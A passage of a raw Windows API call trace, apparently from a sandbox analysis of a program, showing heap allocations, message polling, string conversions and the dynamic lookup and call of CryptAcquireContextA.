Flags=0x0, Size=0xc) returned 0x34aa700 [0188.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0188.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0188.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0188.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0188.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0188.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0188.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0188.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0188.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0188.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0188.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0188.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.132] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0188.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0188.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0188.133] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0188.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0188.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa950 [0188.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0188.133] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0188.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0188.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0188.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0188.134] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0188.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0188.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0188.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0188.134] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0188.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0188.135] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0188.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0188.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0188.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0188.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0188.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0188.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0188.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0188.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0188.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0188.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0188.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0188.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0188.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0188.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0188.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0188.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.138] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0188.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0188.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0188.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0188.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0188.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0188.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0188.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0188.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0188.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0188.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466d90, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0188.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0188.141] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0188.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0188.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0188.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0188.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466d90, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0188.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0188.142] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0188.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0188.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0188.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36f8 | out: hHeap=0x25c0000) returned 1 [0188.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0188.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0188.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0188.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0188.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0188.143] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xa9ffb0) returned 1 [0188.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0188.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0188.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0188.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0188.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0188.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0188.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0188.146] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0188.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0188.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0188.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0188.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.147] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0188.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0188.147] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0188.148] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0188.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0188.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0188.148] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0188.148] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.148] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0188.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0188.149] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.149] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.149] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.149] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0188.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0188.149] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0188.149] PeekMessageW 